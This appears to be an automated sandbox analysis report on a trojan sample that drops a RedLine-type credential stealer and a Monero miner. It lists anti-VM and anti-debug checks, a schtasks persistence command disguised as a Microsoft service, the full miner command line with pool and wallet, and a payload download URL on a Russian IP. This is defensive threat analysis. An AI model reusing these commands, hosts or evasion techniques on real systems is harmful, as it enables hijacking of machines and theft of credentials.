Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\zmql3v0y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\zmql3v0y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\zmql3v0y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe RDTSC instruction interceptor: First address: 000000000176B6D7 second address: 000000000176B6E3 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, ax 0x00000005 bts edx, edx 0x00000008 xor bl, cl 0x0000000a rcl dl, cl 0x0000000c rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 5440 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 4920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285098364.0000000006360000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_
Source: RantimeBroker.exe, 0000000F.00000003.317125414.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: RantimeBroker.exe, 0000000F.00000003.317400847.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RantimeBroker.exe, 0000000F.00000003.316725149.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: RantimeBroker.exe, 0000000F.00000003.316864876.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0@5
Source: RantimeBroker.exe, 0000000F.00000003.317206080.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWuX
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugObjectHandle Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 Jump to behavior
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356837 Sample: SecuriteInfo.com.Trojan.Gen... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 49 api.ip.sb 2->49 51 whois.iana.org 2->51 53 2 other IPs or domains 2->53 67 Sigma detected: Xmrig 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 10 other signatures 2->73 9 SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 15 6 2->9         started        14 RantimeBroker.exe 1 2->14         started        16 RantimeBroker.exe 2->16         started        signatures3 process4 dnsIp5 59 iplogger.org 88.99.66.31, 443, 49719, 49730 HETZNER-ASDE Germany 9->59 61 pastebin.com 104.23.99.190, 443, 49720 CLOUDFLARENETUS United States 9->61 63 blog.agencia10x.com 172.67.213.210, 443, 49721 CLOUDFLARENETUS United States 9->63 43 C:\Users\user\AppData\Local\zmql3v0y.exe, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\pg2bsuqa.exe, PE32 9->45 dropped 47 SecuriteInfo.com.T...54886.17334.exe.log, ASCII 9->47 dropped 95 Detected unpacking (changes PE section rights) 9->95 97 Query firmware table information (likely to detect VMs) 9->97 99 Hides threads from debuggers 9->99 18 zmql3v0y.exe 14 10 9->18         started        23 pg2bsuqa.exe 14 2 9->23         started        101 Multi AV Scanner detection for dropped file 14->101 103 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->103 105 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->105 file6 signatures7 process8 dnsIp9 55 195.2.84.91, 49729, 80 ZENON-ASMoscowRussiaRU Russian Federation 18->55 57 iplogger.org 18->57 35 C:\Users\user\AppData\...\RantimeBroker.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\Roaming\...\cpu.exe, PE32+ 18->37 dropped 39 C:\Users\user\AppData\...\WinRing0x64.sys, PE32+ 18->39 dropped 41 C:\Users\user\AppData\Roaming\...\config.json, ASCII 18->41 dropped 75 Multi AV Scanner detection for dropped file 18->75 77 Detected unpacking (changes PE section rights) 18->77 79 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->79 87 3 other signatures 18->87 25 cpu.exe 1 18->25         started        29 schtasks.exe 1 18->29         started        81 Query firmware table information (likely to detect VMs) 23->81 83 Machine Learning detection for dropped file 23->83 85 Tries to detect virtualization through RDTSC time measurements 23->85 file10 signatures11 process12 dnsIp13 65 pool.minexmr.com 88.99.193.240, 4444, 49731 HETZNER-ASDE Germany 25->65 89 Multi AV Scanner detection for dropped file 25->89 91 Query firmware table information (likely to detect VMs) 25->91 31 conhost.exe 25->31         started        33 conhost.exe 29->33         started        signatures14 93 Detected Stratum mining protocol 65->93 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.23.99.190
 unknown United States
13335 CLOUDFLARENETUS false
88.99.66.31
 unknown Germany
24940 HETZNER-ASDE false
195.2.84.91
 unknown Russian Federation
6903 ZENON-ASMoscowRussiaRU false
172.67.213.210
 unknown United States
13335 CLOUDFLARENETUS false
88.99.193.240
 unknown Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
ianawhois.vip.icann.org 192.0.47.59 true
blog.agencia10x.com 172.67.213.210 true
iplogger.org 88.99.66.31 true
WHOIS.RIPE.NET 193.0.6.135 true
pool.minexmr.com 88.99.193.240 true
pastebin.com 104.23.99.190 true
api.ip.sb unknown unknown
whois.iana.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://195.2.84.91/cpu.zip false
  • Avira URL Cloud: safe
 unknown